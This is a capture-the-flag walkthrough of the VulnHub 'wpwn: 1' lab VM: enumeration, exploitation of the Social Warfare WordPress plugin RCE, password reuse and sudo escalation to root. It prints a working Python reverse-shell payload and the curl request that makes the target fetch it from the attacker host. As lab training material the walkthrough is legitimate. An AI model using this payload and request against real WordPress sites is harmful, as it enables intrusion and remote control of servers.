VulnHub-wpwn-1

From aldeid
Jump to navigation Jump to search

VulnHub > wpwn: 1

  • Name: wpwn: 1
  • Date release: 18 Aug 2020
  • Author: 0xatom
  • Series: wpwn

Description

This is an easy box.

It’s vmware based, i dont know if it works on VB you can test it if you want.

There are 2 flags under /home/$user/user.txt & /root/root.txt.

No stupid ctfy/guessy stuff.

Remember: your goal is to read the root flag, not just to take a root shell. Feel free to DM me on discord for any tip/hint.

Happy pwning! :D

User flag

Services enumeration

Nmap discovers 2 services:

22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 59:b7:db:e0:ba:63:76:af:d0:20:03:11:e1:3c:0e:34 (RSA)
|   256 2e:20:56:75:84:ca:35:ce:e3:6a:21:32:1f:e7:f5:9a (ECDSA)
|_  256 0d:02:83:8b:1a:1c:ec:0f:ae:74:cc:7b:da:12:89:9e (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web enumeration

There is nothing interesting at the root of the website:

kali@kali:/data/wpwnvm$ curl http://wpwnvm.box/
wpwn box
<br>
remember: your goal is not just to get root shell, your goal is to read root.txt is part of the challenge. Have fun! :D

There is a robots.txt file but it’s a rabbit hole (the /secret location doesn’t exist):

kali@kali:/data/wpwnvm$ curl http://wpwnvm.box/robots.txt
/secret
# haha, just kidding. Focus on real stuff ma boi

Gobuster reveals a Wordpress installation:

kali@kali:~$ gobuster dir -u http://wpwnvm.box/ -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://wpwnvm.box/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/22 15:33:00 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/wordpress (Status: 301)
===============================================================
2020/09/22 15:33:02 Finished
===============================================================

Wordpress

Static IP

Browsing the /wordpress directory reveals that the site expects to be called from a static IP (192.168.1.12). I forced the static IP for the VM’s mac address on my router.

wpscan

Wpscan reveals that the social-warfare plugin is vulnerable to Remote Code Execution:

kali@kali:/data/wpwnvm$ wpscan --url http://192.168.1.12/wordpress/ -e vp --api-token <apitoken>
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.7
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.1.12/wordpress/ [192.168.1.12]
[+] Started: Tue Sep 22 18:18:30 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.1.12/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://192.168.1.12/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.1.12/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.1.12/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.1 identified (Latest, released on 2020-09-01).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.1.12/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
 |  - http://192.168.1.12/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>

[+] WordPress theme in use: twentytwenty
 | Location: http://192.168.1.12/wordpress/wp-content/themes/twentytwenty/
 | Latest Version: 1.5 (up to date)
 | Last Updated: 2020-08-11T00:00:00.000Z
 | Readme: http://192.168.1.12/wordpress/wp-content/themes/twentytwenty/readme.txt
 | Style URL: http://192.168.1.12/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.1.12/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5, Match: 'Version: 1.5'

[+] Enumerating Vulnerable Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] social-warfare
 | Location: http://192.168.1.12/wordpress/wp-content/plugins/social-warfare/
 | Last Updated: 2020-08-18T17:05:00.000Z
 | [!] The version is out of date, the latest version is 4.1.0
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Comment (Passive Detection)
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: Social Warfare <= 3.5.2 - Unauthenticated Arbitrary Settings Update
 |     Fixed in: 3.5.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9238
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9978
 |      - https://wordpress.org/support/topic/malware-into-new-update/
 |      - https://www.wordfence.com/blog/2019/03/unpatched-zero-day-vulnerability-in-social-warfare-plugin-exploited-in-the-wild/
 |      - https://threatpost.com/wordpress-plugin-removed-after-zero-day-discovered/143051/
 |      - https://twitter.com/warfareplugins/status/1108826025188909057
 |      - https://www.wordfence.com/blog/2019/03/recent-social-warfare-vulnerability-allowed-remote-code-execution/
 |
 | [!] Title: Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE)
 |     Fixed in: 3.5.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9259
 |      - https://www.webarxsecurity.com/social-warfare-vulnerability/
 |
 | Version: 3.5.2 (100% confidence)
 | Found By: Comment (Passive Detection)
 |  - http://192.168.1.12/wordpress/, Match: 'Social Warfare v3.5.2'
 | Confirmed By:
 |  Query Parameter (Passive Detection)
 |   - http://192.168.1.12/wordpress/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.2
 |   - http://192.168.1.12/wordpress/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.2
 |  Readme - Stable Tag (Aggressive Detection)
 |   - http://192.168.1.12/wordpress/wp-content/plugins/social-warfare/readme.txt
 |  Readme - ChangeLog Section (Aggressive Detection)
 |   - http://192.168.1.12/wordpress/wp-content/plugins/social-warfare/readme.txt

[+] WPVulnDB API OK
 | Plan: free
 | Requests Done (during the scan): 3
 | Requests Remaining: 47

[+] Finished: Tue Sep 22 18:18:34 2020
[+] Requests Done: 7
[+] Cached Requests: 34
[+] Data Sent: 1.528 KB
[+] Data Received: 7.008 KB
[+] Memory used: 173.074 MB
[+] Elapsed time: 00:00:03

Here is a link (https://wpvulndb.com/vulnerabilities/9259) that details the vulnerability.

Reverse shell

Let’s exploit the vulnerability.

Start a listener:

kali@kali:/data/wpwnvm/files$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...

Prepare a python reverse shell and host it with a python web server:

kali@kali:/data/wpwnvm/files$ cat payload.txt 
<pre>system('python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.9",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);\'')</pre>
kali@kali:/data/wpwnvm/files$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.1.12 - - [22/Sep/2020 18:34:58] "GET /payload.txt?swp_debug=get_user_options HTTP/1.0" 200 -

Now call the following URL:

kali@kali:/data/wpwnvm/files$ curl "http://192.168.1.12/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.1.9:8000/payload.txt"

We now have a reverse shell:

kali@kali:/data/wpwnvm/files$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.1.9] from (UNKNOWN) [192.168.1.12] 44542
bash: cannot set terminal process group (487): Inappropriate ioctl for device
bash: no job control in this shell
www-data@wpwn:/var/www/html/wordpress/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

User flag

The user flag is in /home/takis/user.txt:

www-data@wpwn:/var/www/html/wordpress$ ls -la /home
ls -la /home
total 12
drwxr-xr-x  3 root  root  4096 Aug 17 18:50 .
drwxr-xr-x 18 root  root  4096 Aug 17 18:46 ..
drwxr-xr-x  3 takis takis 4096 Aug 17 19:44 takis
www-data@wpwn:/var/www/html/wordpress$ cd /home/takis
cd /home/takis
www-data@wpwn:/home/takis$ ls -la
ls -la
total 32
drwxr-xr-x 3 takis takis 4096 Aug 17 19:44 .
drwxr-xr-x 3 root  root  4096 Aug 17 18:50 ..
-rw------- 1 takis takis   59 Aug 17 20:31 .bash_history
-rw-r--r-- 1 takis takis  220 Aug 17 18:50 .bash_logout
-rw-r--r-- 1 takis takis 3526 Aug 17 18:50 .bashrc
drwxr-xr-x 3 takis takis 4096 Aug 17 19:44 .local
-rw-r--r-- 1 takis takis  807 Aug 17 18:50 .profile
-rw-r--r-- 1 root  root    33 Aug 17 19:00 user.txt
www-data@wpwn:/home/takis$ cat user.txt
cat user.txt
04ebbbf5e6e298e8fab6deb92deb3a7f

Root flag

Lateral move (www-data -> takis)

Checking the Wordpress configuration file (/var/www/html/wordpress/wp-config.php) reveals the password to connect to the database. Below is the interesting extract:

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress_db' );

/** MySQL database username */
define( 'DB_USER', 'wp_user' );

/** MySQL database password */
define( 'DB_PASSWORD', 'R3&]vzhHmMn9,:-5' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

It turns our that takis’ password is the same as the database password. Let’s switch to takis:

www-data@wpwn:/var/www/html/wordpress/wp-admin$ python3 -c "import pty;pty.spawn('/bin/bash')"
<min$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@wpwn:/var/www/html/wordpress/wp-admin$ su takis
su takis
Password: R3&]vzhHmMn9,:-5

takis@wpwn:/var/www/html/wordpress/wp-admin$ id
id
uid=1000(takis) gid=1000(takis) groups=1000(takis),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

At this stage, it may be a good idea to connect over SSH directly to free up the reverse shell.

Priv esc

Checking takis’ privileges reveals that he can elevate to root via sudo:

takis@wpwn:~$ sudo -l
Matching Defaults entries for takis on wpwn:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User takis may run the following commands on wpwn:
    (ALL) NOPASSWD: ALL
takis@wpwn:~$ sudo -s
root@wpwn:/home/takis# id
uid=0(root) gid=0(root) groups=0(root)

Root flag

The /root/root.txt file doesn’t contain the root flag but gives a hint:

root@wpwn:/home/takis# cd /root/
root@wpwn:~# ls -la
total 32
drwx------  3 root root 4096 Aug 17 20:30 .
drwxr-xr-x 18 root root 4096 Aug 17 18:46 ..
-rw-------  1 root root 1812 Aug 17 20:31 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4096 Aug 17 18:58 .local
-rw-------  1 root root  215 Aug 17 19:22 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   87 Aug 17 19:01 root.txt
root@wpwn:~# cat root.txt
damn, i really don't know where i left the root.txt flag, take a look into my USB plz.

Searching for files and directories containing the USB string reveals a potential location that would contain the root flag:

root@wpwn:~# find / -name "*USB*" 2>/dev/null
/dev/input/by-id/usb-VMware_VMware_Virtual_USB_Mouse-mouse
/dev/input/by-id/usb-VMware_VMware_Virtual_USB_Mouse-event-mouse
/usr/games/USB <------------- may be interesting!
/run/udev/links/\x2finput\x2fby-id\x2fusb-VMware_VMware_Virtual_USB_Mouse-mouse
/run/udev/links/\x2finput\x2fby-id\x2fusb-VMware_VMware_Virtual_USB_Mouse-event-mouse

Indeed, the root flag was in /usr/games/USB/root:

root@wpwn:~# cd /usr/games/USB/
root@wpwn:/usr/games/USB# ll
total 12
drwxr-xr-x 2 root root 4096 Aug 17 20:24 .
drwxr-xr-x 3 root root 4096 Aug 17 20:24 ..
-rw-r----- 1 root root   46 Aug 17 20:24 root
root@wpwn:/usr/games/USB# cat root 
19905b045801f04e96d803659ad987ce

-gamer over

Comments

Keywords: ctf vulnhub wpwn wordpress wpscan social-warfare WPVulnDB sudo